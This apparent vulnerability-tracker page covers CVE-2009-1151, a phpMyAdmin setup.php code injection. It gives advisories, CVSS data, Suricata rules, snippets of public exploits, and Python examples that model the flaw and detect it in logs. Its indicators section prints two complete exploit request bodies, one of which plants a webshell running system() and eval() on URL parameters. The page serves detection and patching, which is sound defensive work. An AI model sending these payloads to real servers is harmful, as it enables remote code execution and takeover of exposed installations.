CVE-2009-1151
Published 2009-03-26
Priority P1 · CVSS 3.1 9.8 critical · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA Known Exploited Vulnerability (remediation due 2022-04-15) · Exploited in the wild · Initial access
EPSS 95.44% (99.9th percentile)
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | phpmyadmin | < 4:3.1.3.1-1 (bookworm) | 4:3.1.3.1-1 |
| phpmyadmin | phpmyadmin | >= 0 < 4:3.1.3.1-1 (Debian package version) | 4:3.1.3.1-1 |
| phpmyadmin | phpmyadmin | >= 2.11.0 < 2.11.9.5 | 2.11.9.5 |
| phpmyadmin | phpmyadmin | >= 3.0.0 < 3.1.3.1 | 3.1.3.1 |
Detection & IOCs (extracted from sources)
Request body (setup.php save action, phpinfo() probe): action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]=%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix
Request body (setup.php save action, c=/p= webshell): action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if($_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem($_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if($_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval($_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix
- Detect follow-on webshell access via GET requests to /config/config.inc.php with query parameters 'c' (system command) or 'p' (eval payload); these indicate successful exploitation and shell access.
- Detect /config/config.inc.php being accessible (HTTP 200) alongside a token in /scripts/setup.php; the exploit checks both conditions before proceeding.
- The Metasploit module targets URI /phpMyAdmin/scripts/setup.php and writes its payload to /phpMyAdmin/config/config.inc.php; alert on creation or modification of config/config.inc.php under the phpMyAdmin web root.
- The exploit grabs a 32-character CSRF token from /scripts/setup.php before injecting; a GET followed by a POST to /scripts/setup.php from the same source IP is a strong behavioral indicator.
- The injected webshell is written to config/config.inc.php, which is not the active configuration file; the attacker must separately request that file for the code to execute.
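How the serialized `configuration` parameter above turns into executable PHP: the `Servers` array key is `host']=''; phpinfo();//`, and a config writer that interpolates keys unchecked into `$cfg['Servers'][$i]['...'] = '...';` lines closes the quoted index and starts a new statement. The block below is an added example written for this page, not phpMyAdmin's own setup.php: `php_unserialize` reads only the a/s/i/b types the payload uses, `render_config_vulnerable` models the unvalidated writer, and `render_config_hardened` rejects any key that is not a plain identifier. The exact line layout, the helper names and the `KEY_RE` pattern are this example's assumptions; the sample body is the first IOC request above.

```python
import re
from urllib.parse import parse_qs

# Assumption for the hardened writer: config keys are plain identifiers.
KEY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def php_unserialize(data):
    """Read the subset of PHP serialize() output used by the setup payload:
    a (array), s (string), i (int), b (bool). Arrays become dicts."""
    pos = 0

    def take(pattern):
        nonlocal pos
        m = re.compile(pattern).match(data, pos)
        if not m:
            raise ValueError(f"malformed serialized data at offset {pos}")
        pos = m.end()
        return m

    def parse():
        nonlocal pos
        kind = data[pos:pos + 1]
        if kind == "a":
            n = int(take(r"a:(\d+):\{").group(1))
            out = {}
            for _ in range(n):
                key = parse()
                out[key] = parse()
            take(r"\}")
            return out
        if kind == "s":
            n = int(take(r's:(\d+):"').group(1))
            text = data[pos:pos + n]  # PHP counts bytes; the payload is ASCII
            pos += n
            take(r'";')
            return text
        if kind == "i":
            return int(take(r"i:(-?\d+);").group(1))
        if kind == "b":
            return take(r"b:([01]);").group(1) == "1"
        raise ValueError(f"unsupported type {kind!r} at offset {pos}")

    return parse()


def php_literal(value):
    """Quote a scalar for PHP source. Values are escaped in both writers; the
    injection vector in CVE-2009-1151 is the array key, not the value."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    return "'" + str(value).replace("\\", "\\\\").replace("'", "\\'") + "'"


def _emit(cfg, validate_keys):
    lines = ["<?php", "$i = 0;"]
    for server in cfg.get("Servers", {}).values():
        lines.append("$i++;")
        for key, value in server.items():
            if validate_keys and not KEY_RE.match(key):
                raise ValueError(f"rejected config key: {key!r}")
            # Key goes into the source verbatim; with validate_keys=False a key
            # containing ']= breaks out of the quoted index.
            lines.append(f"$cfg['Servers'][$i]['{key}'] = {php_literal(value)};")
    lines.append("?>")
    return "\n".join(lines)


def render_config_vulnerable(cfg):
    """Models the flaw: client-supplied keys are trusted."""
    return _emit(cfg, validate_keys=False)


def render_config_hardened(cfg):
    """Same writer with key validation; unknown shapes are refused, not escaped."""
    return _emit(cfg, validate_keys=True)


# The first IOC body from this page, used as the sample input.
SAMPLE_BODY = (
    "action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{"
    "s:23:%22host%27]=%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3b"
    "s:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3b"
    "s:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3b"
    "s:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
)
# A constructed benign save with a single well-formed key.
CLEAN_BODY = ("action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:1:{"
              "s:4:%22host%22%3bs:9:%22localhost%22%3b}}}&eoltype=unix")


def config_from_body(body):
    return php_unserialize(parse_qs(body)["configuration"][0])


def injected_line(body):
    """The config.inc.php line the vulnerable writer produces for the payload."""
    out = render_config_vulnerable(config_from_body(body))
    return next(l for l in out.splitlines() if "phpinfo" in l)


def hardened_rejects(body):
    try:
        render_config_hardened(config_from_body(body))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(injected_line(SAMPLE_BODY))
    print("hardened rejects payload:", hardened_rejects(SAMPLE_BODY))
```

The vulnerable writer emits `$cfg['Servers'][$i]['host']=''; phpinfo();//'] = 'localhost';`, which PHP parses as an assignment, a call to phpinfo(), and a trailing comment. Escaping values would not have helped; the fix is to refuse keys that are not known identifiers before anything reaches the generated file.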
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | | 9.8 | CRITICAL | |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
| vendor_debian | | 9.8 | CRITICAL | |
| vendor_redhat | | 9.8 | CRITICAL | |
CISA
phpMyAdmin Remote Code Execution Vulnerability
cisa · 2022-03-25 · CVSS 9.8 · CRITICAL · CWE-94
Vulnerability: phpMyAdmin Remote Code Execution Vulnerability
Affected: phpMyAdmin phpMyAdmin
The setup script used to generate the configuration can be fooled, with a crafted POST request, into including arbitrary PHP code in the generated configuration file.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2009-1151
Remediation Due Date: 2022-04-15
Debian
CVE-2009-1151: phpmyadmin - Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.1...
vendor_debian · 2009 · CVSS 9.8 · CRITICAL
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
Scope: local
bookworm: resolved (fixed in 4:3.1.3.1-1)
bullseye: resolved (fixed in 4:3.1.3.1-1)
forky: resolved (fixed in 4:3.1.3.1-1)
sid: resolved (fixed in 4:3.1.3.1-1)
trixie: resolved (fixed in 4:3.1.3.1-1)
Red Hat
phpMyAdmin: multiple security fixes in 3.1.3.1 (PMASA-2009-{1,2,3})
vendor_redhat · CVSS 9.8 · CRITICAL
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
GHSA
GHSA-fw5c-3235-cprv: Static code injection vulnerability in setup
ghsa_unreviewed · 2022-05-02 · HIGH · CWE-94
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
OSV
CVE-2009-1151: Static code injection vulnerability in setup
osv · 2009-03-26 · CVSS 9.8 · CRITICAL
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.
VulnCheck
phpMyAdmin Remote Code Execution Vulnerability
vulncheck · 2009 · CVSS 9.8 · CRITICAL · CWE-94
The setup script used to generate the configuration can be fooled, with a crafted POST request, into including arbitrary PHP code in the generated configuration file.
Affected: phpMyAdmin phpMyAdmin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2009-1151; https://blog.talosintelligence.com/2019/04/seaturtle.html; https://www.ic3.gov/Media/News/2022/220126.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/; https://info.greynoise.io/hubfs/resources/GreyNoise-2025-Mass-Internet-Exploitation-Report.pdf
Exploit PoC: https://vulncheck.com/xdb/a8f294c1448e; https://vu
Suricata
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (p=)
suricata · 2010-07-30 · sid 2010902
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (p=)"; flow:established,to_server; http.uri; content:"/config/config.inc.php"; content:"p=phpinfo()"; reference:url,www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/; classtype:web-application-attack; sid:2010902; rev:7; metadata:created_at 2010_07_30, signature_severity Major, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)
suricata · 2010-07-30 · sid 2010903
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS phpMyAdmin Remote Code Execution Proof of Concept (c=)"; flow:established,to_server; http.uri; content:"/config/config.inc.php"; content:"c="; reference:url,www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/; classtype:web-application-attack; sid:2010903; rev:7; metadata:created_at 2010_07_30, signature_severity Major, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
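The two Emerging Threats signatures only see the follow-on webshell requests to config/config.inc.php. The Detection & IOCs notes above add three earlier stages: the probe for a reachable config/config.inc.php, the GET-then-POST sequence against scripts/setup.php, and the save body whose serialized key contains `']=`. The block below is an added example written for this page (not code from Emerging Threats, Metasploit or phpMyAdmin) that runs all four checks over constructed request records of the form (source IP, method, request target, POST body, status); the record shape, the IP addresses and the indicator names are this example's assumptions, and the injection body is a shortened version of the first IOC payload.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# A serialized array key that closes the quoted index of the generated
# $cfg['Servers'][$i]['host'] line and starts a new PHP statement: host']=''; ...
INJECT_RE = re.compile(r"'\]=")
SETUP_PATH = "/scripts/setup.php"
CONFIG_PATH = "/config/config.inc.php"


def is_injection_body(body):
    """True when a setup.php POST is a save action whose serialized
    configuration carries a quote-break inside an array key."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action") != ["save"]:
        return False
    configuration = params.get("configuration", [""])[0]  # already URL-decoded
    return INJECT_RE.search(configuration) is not None


def detect(records):
    """records: iterable of (ip, method, target, body, status) tuples in log
    order. Returns (ip, indicator) pairs, one per matched stage."""
    findings = []
    saw_setup_get = defaultdict(bool)  # ip -> fetched the setup page (CSRF token)
    for ip, method, target, body, status in records:
        parts = urlsplit(target)
        path, query = parts.path, parse_qs(parts.query)
        if path.endswith(SETUP_PATH):
            if method == "GET":
                saw_setup_get[ip] = True
            elif method == "POST":
                if saw_setup_get[ip]:
                    findings.append((ip, "setup-get-then-post"))
                if is_injection_body(body):
                    findings.append((ip, "config-injection"))
        elif path.endswith(CONFIG_PATH) and status == "200":
            # config/config.inc.php is not the live config; any 200 is odd, and
            # c= / p= parameters match the ET signatures' webshell usage.
            if "c" in query or "p" in query:
                findings.append((ip, "webshell-access"))
            else:
                findings.append((ip, "config-reachable"))
    return findings


# Constructed records for this example (documentation IP ranges).
SAMPLE_RECORDS = [
    ("203.0.113.7", "GET", "/phpMyAdmin/config/config.inc.php", "", "200"),
    ("203.0.113.7", "GET", "/phpMyAdmin/scripts/setup.php", "", "200"),
    ("203.0.113.7", "POST", "/phpMyAdmin/scripts/setup.php",
     "action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:2:{"
     "s:23:%22host%27%5d=%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3b"
     "s:9:%22auth_type%22%3bs:6:%22config%22%3b}}}&eoltype=unix", "200"),
    ("203.0.113.7", "GET", "/phpMyAdmin/config/config.inc.php?c=id", "", "200"),
    ("198.51.100.9", "GET", "/phpMyAdmin/index.php", "", "200"),
    ("198.51.100.9", "POST", "/phpMyAdmin/scripts/setup.php",
     "action=save&configuration=a:0:{}&eoltype=unix", "200"),
]


def run_sample():
    return detect(SAMPLE_RECORDS)


if __name__ == "__main__":
    for ip, indicator in run_sample():
        print(ip, indicator)
```

The benign host's plain save without a prior GET and without a quote-break produces nothing; the attacking host trips all four stages in order, which is the sequence the PoC scripts on this page follow. Access logs do not normally record POST bodies, so the config-injection stage needs a WAF, reverse-proxy or application log that does.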
Exploit-DB
phpMyAdmin - Config File Code Injection (Metasploit)
exploitdb · 2010-07-03
---
##
# $Id: phpmyadmin_config.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'PhpMyAdmin Config File Code Injection',
      'Description' => %q{
        This module exploits a vulnerability in PhpMyAdmin's setup
        feature which allows an attacker to inject arbitrary PHP
        code into a configuration file. The original advisory says
        the vulnerability is present in phpMyAdmin versions 2.11.x
        < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1.
      },
      'Author'      =>
        [
          'Greg Ose', # Discovery
          'pagvac',   # milw0rm PoC
          'egypt'     # metasploit module
        ],
Exploit-DB
phpMyAdmin - 'pmaPWN!' Code Injection / Remote Code Execution
exploitdb · 2009-06-22
---
if ($argc <= 1) { // no target supplied: print banner and usage
    print "|****************************************************************|\n";
    print " pmaPWN.php - d3ck4, [email protected]\n";
    print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
    print " This is PHP version original http://milw0rm.com/exploits/8921\n";
    print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
    print " greetz: Hacking Expose!, HM Security, darkc0de\n";
    print "|****************************************************************|\n";
    print "\n";
    print "Usage: php $argv[0] \n";
    exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, [email protected]\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP
Exploit-DB
phpMyAdmin - '/scripts/setup.php' PHP Code Injection
exploitdb · 2009-06-09 · CVSS 9.8 · CRITICAL
---
#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyA
Nuclei
PhpMyAdmin Scripts - Remote Code Execution
nuclei · CVSS 9.8 · CRITICAL
PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
Template:
id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: high
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server
Metasploit
PhpMyAdmin Config File Code Injection
metasploit
This module exploits a vulnerability in phpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1. The file where the payload is written (phpMyAdmin/config/config.inc.php) is not directly used by the system, so it may be a good idea to either delete it or copy the running config (phpMyAdmin/config.inc.php) over it after successful exploitation.
Tenable
Sea Turtle DNS Hijacking Campaign Utilizes At Least Seven Patched Vulnerabilities
blogs_tenable·2019-04-19
Talos
DNS Hijacking Abuses Trust In Core Internet Service
blogs_talos · 2019-04-17
By Danny Adamitis, David Maynor, Warren Mercer, Matthew Olney and Paul Rascagneres.
Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House; we thank them for their assistance.
## Preface
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the inter
References
http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00003.html
http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
http://secunia.com/advisories/34430
http://secunia.com/advisories/34642
http://secunia.com/advisories/35585
http://secunia.com/advisories/35635
http://security.gentoo.org/glsa/glsa-200906-03.xml
http://www.debian.org/security/2009/dsa-1824
http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/
http://www.mandriva.com/security/advisories?name=MDVSA-2009:115
http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
http://www.securityfocus.com/archive/1/504191/100/0/threaded
http://www.securityfocus.com/bid/34236
https://www.exploit-db.com/exploits/8921
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2009-1151
Timeline
2009-03-26: Published
2022-03-25: Added to CISA KEV
Exploited in the wild